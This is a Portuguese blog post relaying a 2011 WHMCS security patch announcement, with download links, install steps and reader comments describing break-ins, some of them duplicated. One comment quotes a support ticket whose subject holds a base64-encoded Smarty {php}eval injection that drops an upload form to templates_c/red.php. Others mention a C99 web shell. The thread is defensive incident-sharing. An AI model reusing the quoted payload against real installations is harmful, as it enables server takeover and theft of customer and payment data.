Atualização de Segurança

76

Urgente! WHMCS.com divulgou através do fórum / twitter um novo problema de segurança no WHMCS que atinge TODAS as versões. Esse ano ocorreram 2 atualizações similares a essa. Uma foi em 15/10/2011 e 13/06/2011.

Segue anúncio em inglês divulgado hoje:

A security issue has been discovered that we consider to be of a high severity, and as a result we have decided there is a need to release an immediate patch for it.

Although not related to the new release, it is unfortunate timing so soon after the release, but we take security very seriously and so if an issue becomes apparent to us, we will always issue a patch immediately for it as our track record with patches in recent years demonstrates.

Applying the patch is very simple. It’s just a single file to update. There are separate versions of the file for each release of WHMCS from V4.0 up to the very latest V5.0 release. The patch download consists of a single file which just needs to be unzipped, and then uploaded to the /includes/ folder replacing the existing file.

Tradução livre do comunicado na íntegra:

Detectamos uma falha de segurança de grande severidade e como resultado disto nós decidimos por disponibilizar uma atualização de correção imediatamente.

Embora o problema não esteja diretamente relacionado com a nova versão, este problema aconteceu exatamente após o lançamento da nossa nova versão (5.0), no entanto nós levamos a segurança a sério e por isso decidimos lançar uma atualização de correção imediatamente, como nosso histórico de atualizações de segurança pode demonstrar.

Aplicar a atualização é muito fácil, pois trata-se apenas de um único arquivo a ser substituído. Há versões separadas do arquivo a ser sobrescrito para diversas versões do WHMCS, desde a 4.0 até a recente 5.0. A atualização, como disse, constitui-se de um único arquivo que deve ser descompactado e enviado diretamente para a pasta “/includes/”, substituindo o atual arquivo.

Para corrigir o problema, identifique a versão atual do seu WHMCS. Na página inicial do admin, lateral esquerda veja em System Information procure pela linha Version

Efetue o download do arquivo seguindo a referência abaixo:

1) 4.0.x -> http://www.whmcs.com/members/dl.php?type=d&id=107
2) 4.1.x -> http://www.whmcs.com/members/dl.php?type=d&id=108
3) 4.2.x -> http://www.whmcs.com/members/dl.php?type=d&id=109
4) 4.3.x -> http://www.whmcs.com/members/dl.php?type=d&id=110
5) 4.4.x -> http://www.whmcs.com/members/dl.php?type=d&id=111
6) 4.5.x -> http://www.whmcs.com/members/dl.php?type=d&id=112
7) 5.0.x -> http://www.whmcs.com/members/dl.php?type=d&id=113

Exemplo, minha versão é 5.0.2 baixei o link 7 e descompactei o arquivo dec11patch_v5.zip em seguida enviei o arquivo functions.php para pasta /includes/.

Mesmo se você atualizou recentemente seu WHMCS você deverá obrigatoriamente efetuar essa atualização! Caso você faça uma nova instalação do WHMCS e tenha baixado o arquivo de instalação apartir do site da WHMCS.com não é necessário fazer esse processo pois o arquivo já conta com essa atualização de segurança.

Um visitante do blog fez  o seguinte comentário há 4 dias atrás referente a versão 5.0.2 do WHMCS:

Ta com falha de segurança grave a versão 5.x, assim que instalei em menos de 24 horas conseguiram entrar no admin e pegaram o login e senha root, entraram no servidor e ainda conseguiram pegar o /etc/passwd inteiro. Minha sorte que eu estava logado na hora e deu tempo de mudar a porta do ssh e bloquear o acesso, porém tive de mudar todas as senhas de root, mysql, e-mails, paypal, pagseguro, contas bancárias etc. Ainda tive de forçar a troca de senhas de todas as contas cPanel, as contas que ainda vão ser afetadas terei de restaurar o backup delas. E pra completar se eu libero a conta com o WHMCS em menos de 1 hora entram de novo mesmo depois de trocar todas as senhas de conexões do bd, admin etc. Tive de deixar suspensa a conta e estou levando um prejuízo altissimo por dia. Agora o jeito é aguardar o novo servidor para configurarmos hoje ainda e ir migrando as contas aos poucos até o final do dia. E o WHMCS terei de voltar para a versão 4.5.2 porém estou pensando seriamente se vou continuar com ele.

Possa ser que tenha relação com esse update!

Eu já fiz a atualização no meu WHMCS e você?

76 COMENTÁRIOS

    • Tive o mesmo problema relatado acima, mas na versão 4.5.2, forcei a troca de todas as senhas direto no whm/cpanel, trocar todos os API e dados bancários, por fim apaguei a conta/domínio do whmcs e criei novamente do zero já com a versão 5.0.2 acreditando que não teria problemas.

      Acreditava ser um caso isolado já que tinha corrigido todas as falhas apontadas anteriormente.

      Após a instalação da versão 5.0.2, troca de nome da pasta admin e colocação de senha na mesma não tive mais problemas.

      De qualquer forma estou fazendo a atualização.

    • Tive o mesmo problema relatado acima, mas na versão 4.5.2, forcei a troca de todas as senhas direto no whm/cpanel, trocar todos os API e dados bancários, por fim apaguei a conta/domínio do whmcs e criei novamente do zero já com a versão 5.0.2 acreditando que não teria problemas.

      Acreditava ser um caso isolado já que tinha corrigido todas as falhas apontadas anteriormente.

      Após a instalação da versão 5.0.2, troca de nome da pasta admin e colocação de senha na mesma não tive mais problemas.

      De qualquer forma estou fazendo a atualização.

  1. Não utilizo mais o WHMCS, ou melhor, nunca mais eu vou mexer com hosting, ninguém merece!!!

    Atualizei meu WHMCS e fiz essa atualização de segurança, no outro dia meu WHMCS estava com uma página de hackers, somente o WHMCS. Roubaram minhas senhas,e meus clientes foram todos excluídos. Meu WHMCS esta super protegido, pasta admin renomeada e com senha, senha do cpanel de 48 caracteres com vários caracteres especiais. Arquivos todos organizados, não tinha nada de errado. E o banco de dados tinha uma senha super forte, e com certeza não tinha nada de errado la.

    Bom, mas enfim eu descobri como eles invadiram meu whmcs, baixei a pasta inteira do meu WHMCS e fui comparando os arquivos com uma versão original, e para a minha surpresa, tinha uma SHELL HACK (aqueles arquivos que da para controlar quase o servidor inteiro por um simples arquivo) na pasta attachments, e em várias outras pastas. Era um arquivo PHP com o nome “C99byjins.php”, não sei como conseguiram fazer upload desse arquivo PHP sendo que nos tickets é impossível de enviar um arquivo em anexo com a extenção .PHP.

    Mandei tickets a whmcs.com informando sobre o problema, até hoje não recebi uma resposta.

    Aqui fica a minha completa insatisfação em relação ao WHMCS. Esse gerenciador tem muitas coisa para melhorar, no quesito SEGURANÇA. Então quem utiliza ele, tome muito cuidado, pois esta correndo sérios riscos de perder TUDOO, tudo mesmo!!

  2. Não utilizo mais o WHMCS, ou melhor, nunca mais eu vou mexer com hosting, ninguém merece!!!

    Atualizei meu WHMCS e fiz essa atualização de segurança, no outro dia meu WHMCS estava com uma página de hackers, somente o WHMCS. Roubaram minhas senhas,e meus clientes foram todos excluídos. Meu WHMCS esta super protegido, pasta admin renomeada e com senha, senha do cpanel de 48 caracteres com vários caracteres especiais. Arquivos todos organizados, não tinha nada de errado. E o banco de dados tinha uma senha super forte, e com certeza não tinha nada de errado la.

    Bom, mas enfim eu descobri como eles invadiram meu whmcs, baixei a pasta inteira do meu WHMCS e fui comparando os arquivos com uma versão original, e para a minha surpresa, tinha uma SHELL HACK (aqueles arquivos que da para controlar quase o servidor inteiro por um simples arquivo) na pasta attachments, e em várias outras pastas. Era um arquivo PHP com o nome “C99byjins.php”, não sei como conseguiram fazer upload desse arquivo PHP sendo que nos tickets é impossível de enviar um arquivo em anexo com a extenção .PHP.

    Mandei tickets a whmcs.com informando sobre o problema, até hoje não recebi uma resposta.

    Aqui fica a minha completa insatisfação em relação ao WHMCS. Esse gerenciador tem muitas coisa para melhorar, no quesito SEGURANÇA. Então quem utiliza ele, tome muito cuidado, pois esta correndo sérios riscos de perder TUDOO, tudo mesmo!!

  3. Olá! Eu fiz a atualização para a última versão do  WHMCS bem como a atualização dec11patch_v5 porém notei que algumas funcionalidades do meu WHMCS não estão 100% como por exemplo. O cron esta configurado perfeitamente porém o sistema não esta enviando as  notificações aos clientes,  o horário esta desconfigurado, o status do servidor  fica como se o mesmo não existisse, e ao executar o cron manualmente percebi nos logs da atividade do sistema o seguinte erro Smarty Error: [in emailtpl:emailmessage line 4. Alguém sabe o que pode estar ocorrendo? Já tentamos abrimos alguns chamados diretamente no fabricante porém não recebemos retorno. Obrigado!

      • Mesmo com a atualização invadiram meu whmcs 5.0, mudei para 4.5.2 e invadiram tb. Vou desativar o whmcs ate resolverem o problema de seguraça, por enquanto vou usando meu velho msx com MSDOS 5.2 e caneta para efetuar minhas cobranças!

        • Se você enviou a correção divulgada pela WHMCS.com e mesmo assim o problema persistiu certamente o arquivo do crack estava na pasta /templates_c/ ou /lang/ e daí o cracker procedeu a invasão enviando arquivos!

  4. Olá! Eu fiz a atualização para a última versão do  WHMCS bem como a atualização dec11patch_v5 porém notei que algumas funcionalidades do meu WHMCS não estão 100% como por exemplo. O cron esta configurado perfeitamente porém o sistema não esta enviando as  notificações aos clientes,  o horário esta desconfigurado, o status do servidor  fica como se o mesmo não existisse, e ao executar o cron manualmente percebi nos logs da atividade do sistema o seguinte erro Smarty Error: [in emailtpl:emailmessage line 4. Alguém sabe o que pode estar ocorrendo? Já tentamos abrimos alguns chamados diretamente no fabricante porém não recebemos retorno. Obrigado!

      • Mesmo com a atualização invadiram meu whmcs 5.0, mudei para 4.5.2 e invadiram tb. Vou desativar o whmcs ate resolverem o problema de seguraça, por enquanto vou usando meu velho msx com MSDOS 5.2 e caneta para efetuar minhas cobranças!

        • Se você enviou a correção divulgada pela WHMCS.com e mesmo assim o problema persistiu certamente o arquivo do crack estava na pasta /templates_c/ ou /lang/ e daí o cracker procedeu a invasão enviando arquivos!

  5. Estranho, eu ainda uso a versao 4.5 assim que saiu a noticia do pack de segurança no mesmo dia atualize (nao de versao e sim o arquivo do pack).

    Hoje inicio de tarde meu whmcs foi hackeado:
    Dentro de meu WHMCS na opção atividades recentes apareceu: http://clip2net.com/s/1nHxbE no e-mail que recebi, tinha este conteudo: http://clip2net.com/s/1nHyU 

    Acessei via FTP as pastas /templates_c/ ou /lang/  para ver s etinha algo, e nada ZERO…  estranho heim…

    Someti a whmcs e me responderam que era para ignorar, pois se ja tinha atualizado com o pack de segurança nao teria problemas. so excluir os e-mails e desconsiderar novos ataques….

  6. Estranho, eu ainda uso a versao 4.5 assim que saiu a noticia do pack de segurança no mesmo dia atualize (nao de versao e sim o arquivo do pack).

    Hoje inicio de tarde meu whmcs foi hackeado:
    Dentro de meu WHMCS na opção atividades recentes apareceu: http://clip2net.com/s/1nHxbE no e-mail que recebi, tinha este conteudo: http://clip2net.com/s/1nHyU

    Acessei via FTP as pastas /templates_c/ ou /lang/  para ver s etinha algo, e nada ZERO…  estranho heim…

    Someti a whmcs e me responderam que era para ignorar, pois se ja tinha atualizado com o pack de segurança nao teria problemas. so excluir os e-mails e desconsiderar novos ataques….

    • Essa chatice tá atingindo todo mundo!

      Mas se você aplicou o patch de segurança não tem o que se preocupar.

      Depois verifique se não existe um arquivo chamado “red.php” no seu /templates_c/

  7. O meu também teve tentativa de invasão:

    A new support ticket has been opened.

    Client: sssDepartment: ComercialSubject: {php}eval(base64_decode(‘JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw==’));{/php}Priority: Medium

    • Essa chatice tá atingindo todo mundo!

      Mas se você aplicou o patch de segurança não tem o que se preocupar.

      Depois verifique se não existe um arquivo chamado “red.php” no seu /templates_c/

DEIXE UMA RESPOSTA

Please enter your comment!
Please enter your name here